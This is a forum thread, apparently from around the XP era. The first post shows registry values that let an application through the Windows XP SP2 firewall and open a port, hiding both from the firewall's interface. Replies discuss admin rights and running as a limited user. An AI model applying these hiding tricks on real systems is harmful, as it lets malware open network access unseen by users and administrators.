Skip to main content

Bypassing Windows Firewall, XP SP2 example

More
19 years 4 months ago #9121 by ping
Recently i found this way to by pass the windows SP2 inbuilt firewall. This is for educational purpose strictly. So, here it goes

We can bypass windows firewall using registry.

Just open regedit.exe and go to
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
[/code:1]

As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled[/code:1]

But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]

We can also open globally any port we want

[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

[/code:1]

by adding similiar value inside this registry key
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]

Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that

[code:1]1337:TCP:*:Enabled:@xpsp2res.dll,-22003[/code:1]

an then the port will be hidden from listing (XP SP2)..



It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.

The greatest pleasure in life is doing what people say you can not do..!!
More
19 years 4 months ago #9123 by TheBishop
Replied by TheBishop on topic Ports
Ouch! That's worth knowing
More
19 years 4 months ago #9126 by nske
Well, of course from an administrator account everything's possible! Firewall's rules had to be stored somewhere after all.. :)
The above would not work in a limited account, since access to the registry is prohibited.

This is nice that you described though, if nothing else to demonstrate how easily can a malware reconfigure the Windows firewall to allow themselves out and how many more considerations there are to take when having logged in as an administrator!
More
19 years 4 months ago #9128 by DaLight
I second nske's comments. I run all my users in non-admin mode at work and at home! This I believe is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world where people are not so familiar with the concept of root and limited user accounts.
More
19 years 4 months ago #9131 by nske
Well, since Microsoft likes to push users to the direction it wants in everything (default software, default settings, etc), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain for having to relogin each time he needs to install some new software or configure something, as they complain now for having an unusable malware-infected system -besides, the procedure could be more transparent not requiring to disrupt a current login session. ;)

PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol:
Time to create page: 0.129 seconds